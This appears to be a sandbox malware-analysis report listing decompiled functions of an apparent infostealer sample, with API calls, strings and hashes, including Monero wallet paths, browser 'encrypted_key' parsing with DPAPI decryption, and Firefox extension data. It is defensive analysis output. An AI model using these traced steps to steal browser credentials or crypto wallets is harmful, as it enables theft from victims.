Opcode Fuzzy Hash: dda9cb27b4c8513b70f4b7c0fc4ed869ef146fb3369ed2c6ce76d4949e3573ae
Instruction Fuzzy Hash: 04115EB1A44205EBEB14CF94ED4AFBBBBBCEB04B11F10415AFE05B7690D77458089BA1

Function 003412A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 003412B4
RtlAllocateHeap.NTDLL(00000000), ref: 003412BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 003412D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003412F5
RegCloseKey.ADVAPI32(?), ref: 003412FF

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 263cabebc37dfa5a62d0f570fc77d643f1863c0bab09f675c6e3dd5ee605689a
Instruction ID: 39670efc6b9468fc9d4759eb28d16fd2ec416dac2ccdaf0acbdafa9cebdac5c4
Opcode Fuzzy Hash: 263cabebc37dfa5a62d0f570fc77d643f1863c0bab09f675c6e3dd5ee605689a
Instruction Fuzzy Hash: 8B0136B5A40208BBEB00DFD0DC49FAEB7B8EB48701F008155FE05E7280D6749A059F51

Function 0034A0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(01368B00,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF), ref: 0034A0BD
LoadLibraryA.KERNEL32(0136D638), ref: 0034A146

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A820: lstrlen.KERNEL32(00344F05,?,?,00344F05,00360DDE), ref: 0035A82B
Part of subcall function 0035A820: lstrcpy.KERNEL32(00360DDE,00000000), ref: 0035A885

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01368840,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

SetEnvironmentVariableA.KERNEL32(01368B00,00000000,00000000,?,003612D8,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00360AFE), ref: 0034A132

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0034A0B2, 0034A0C6, 0034A0DC

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-4027016359
Opcode ID: e6489202c81ed7be0ae732c29adfd6d738679699846f9bea6aab478b8136a73c
Instruction ID: ac1ce31f385b7c3a123e06e3ba3502b3ce8605f831ea7bef61f07236f88a04f3
Opcode Fuzzy Hash: e6489202c81ed7be0ae732c29adfd6d738679699846f9bea6aab478b8136a73c
Instruction Fuzzy Hash: 124184B1D015049FE706DFA5EC45EA937B4BB24301F14151AFD05BB2A4EB34694CEB53

Function 0034A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01368840,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

Part of subcall function 00358B60: GetSystemTime.KERNEL32(00360E1A,0136A088,003605AE,?,?,003413F9,?,0000001A,00360E1A,00000000,?,01368840,?,\Monero\wallet.keys,00360E17), ref: 00358B86

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0034A2E1
lstrlen.KERNEL32(00000000,00000000), ref: 0034A3FF
lstrlen.KERNEL32(00000000), ref: 0034A6BC

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

DeleteFileA.KERNEL32(00000000), ref: 0034A743

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 0c9184ec9debefb25d108a202f04f7edf55dd4aebc4a78b169cdbdeaacf5e77f
Instruction ID: 5ac4cf1df55c54c7ab0e750f2977da6f910d2d9658ef3d2b9518c3554e56dcc2
Opcode Fuzzy Hash: 0c9184ec9debefb25d108a202f04f7edf55dd4aebc4a78b169cdbdeaacf5e77f
Instruction Fuzzy Hash: C1E1E6728105189ADB06FBA4DC92DEE7738BF14301F508259F9177A0A1EF346A4DEB62

Function 0034D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01368840,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

Part of subcall function 00358B60: GetSystemTime.KERNEL32(00360E1A,0136A088,003605AE,?,?,003413F9,?,0000001A,00360E1A,00000000,?,01368840,?,\Monero\wallet.keys,00360E17), ref: 00358B86

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0034D801
lstrlen.KERNEL32(00000000), ref: 0034D99F
lstrlen.KERNEL32(00000000), ref: 0034D9B3
DeleteFileA.KERNEL32(00000000), ref: 0034DA32

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: b33f1d42356666e962adb03694791d82f7e80b9f3c89f751c8085f4ffe551e77
Instruction ID: e9c4341c507bc5c08a4f93dd15eb198634b6f3592e4209d6f61663d46d8803e5
Opcode Fuzzy Hash: b33f1d42356666e962adb03694791d82f7e80b9f3c89f751c8085f4ffe551e77
Instruction Fuzzy Hash: EB8100729105189ADB06FBA4DC96DEE7738BF14301F504219F907BA0A1EF346A0DEB62

Function 0034F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Part of subcall function 003499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003499EC
Part of subcall function 003499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00349A11
Part of subcall function 003499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00349A31
Part of subcall function 003499C0: ReadFile.KERNEL32(000000FF,?,00000000,0034148F,00000000), ref: 00349A5A
Part of subcall function 003499C0: LocalFree.KERNEL32(0034148F), ref: 00349A90
Part of subcall function 003499C0: CloseHandle.KERNEL32(000000FF), ref: 00349A9A

Part of subcall function 00358E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00358E52

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01368840,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00361580,00360D92), ref: 0034F54C
lstrlen.KERNEL32(00000000), ref: 0034F56B

Strings

moz-extension+++, xrefs: 0034F5AD
^userContextId=4294967295, xrefs: 0034F59C

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: 9fcf34f4293625fee8bdb8eaf633634049c6a822f7ef505bad981594bed62cb1
Instruction ID: 36dbaebc4388520166b3d2fccbfa92e985a396b84f61e4612c04282aacb8730c
Opcode Fuzzy Hash: 9fcf34f4293625fee8bdb8eaf633634049c6a822f7ef505bad981594bed62cb1
Instruction Fuzzy Hash: 0D512471D106089ADB05FBB0DC56DED7778AF54301F408628FC16AB1A1EF346A0DEBA2

Function 003570D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON

Download Yara Rule

Strings

s5, xrefs: 00357111
s5, xrefs: 003572AE, 00357179, 0035717C
65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0035718C

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: s5$s5$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 3722407311-867831089
Opcode ID: 6763ad6d108b3a826c57ff20793d1c1c6a17a0f6fbc7e4f353f4c3fc62470b21
Instruction ID: 0db698811c4a2bcb273e3bd32a9fbb6549588bca1c6bb59f36ebafbdb3176589
Opcode Fuzzy Hash: 6763ad6d108b3a826c57ff20793d1c1c6a17a0f6fbc7e4f353f4c3fc62470b21
Instruction Fuzzy Hash: C0517EB0C046089BDB25EB90DC86FEEB774AF44301F5045A8EA167B1A1EB746E8CDF54

Function 00349CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 003499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003499EC
Part of subcall function 003499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00349A11
Part of subcall function 003499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00349A31
Part of subcall function 003499C0: ReadFile.KERNEL32(000000FF,?,00000000,0034148F,00000000), ref: 00349A5A
Part of subcall function 003499C0: LocalFree.KERNEL32(0034148F), ref: 00349A90
Part of subcall function 003499C0: CloseHandle.KERNEL32(000000FF), ref: 00349A9A

Part of subcall function 00358E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00358E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00349D39

Part of subcall function 00349AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N4,00000000,00000000), ref: 00349AEF
Part of subcall function 00349AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00344EEE,00000000,?), ref: 00349B01
Part of subcall function 00349AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N4,00000000,00000000), ref: 00349B2A
Part of subcall function 00349AC0: LocalFree.KERNEL32(?,?,?,?,00344EEE,00000000,?), ref: 00349B3F

Part of subcall function 00349B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00349B84
Part of subcall function 00349B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00349BA3
Part of subcall function 00349B60: LocalFree.KERNEL32(?), ref: 00349BD3

Strings

, xrefs: 00349DC1
DPAPI, xrefs: 00349D89
"encrypted_key":", xrefs: 00349D30

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

